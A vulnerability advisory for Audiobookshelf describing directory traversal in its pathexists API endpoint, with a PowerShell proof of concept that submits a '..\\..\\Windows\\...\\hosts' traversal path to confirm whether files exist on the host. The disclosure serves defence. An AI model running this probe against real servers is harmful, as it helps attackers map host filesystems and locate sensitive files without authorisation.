Summary
Directory traversal in POST /api/filesystem/pathexists lets any authenticated user with canUpload = true probe for the existence of any file on the host OS
PoC
Provide your bearer token, set the directory field to the path to probe and the folderPath field to the root of your library.
```powershell
$HostURL = 'http://192.168.x.xx'   # Audiobookshelf base URL
$Token = '<valid_bearer_token>'    # Your bearer token
$Directory = '..\\..\\Windows\\System32\\drivers\\etc\\hosts'  # Target file to probe (relative to folderPath)
$FolderPath = 'C:/AudioBooks'      # Any valid library root

$Body = @{
    directory  = $Directory
    folderPath = $FolderPath
} | ConvertTo-Json

$Headers = @{
    'Authorization' = "Bearer $Token"
    'Content-Type'  = 'application/json'
}

$response = Invoke-RestMethod -Method Post `
    -Uri "$HostURL/audiobookshelf/api/filesystem/pathexists" `
    -Headers $Headers -Body $Body

$response | ConvertTo-Json
```
Impact
Authenticated attackers can map the host filesystem and confirm the presence of sensitive files.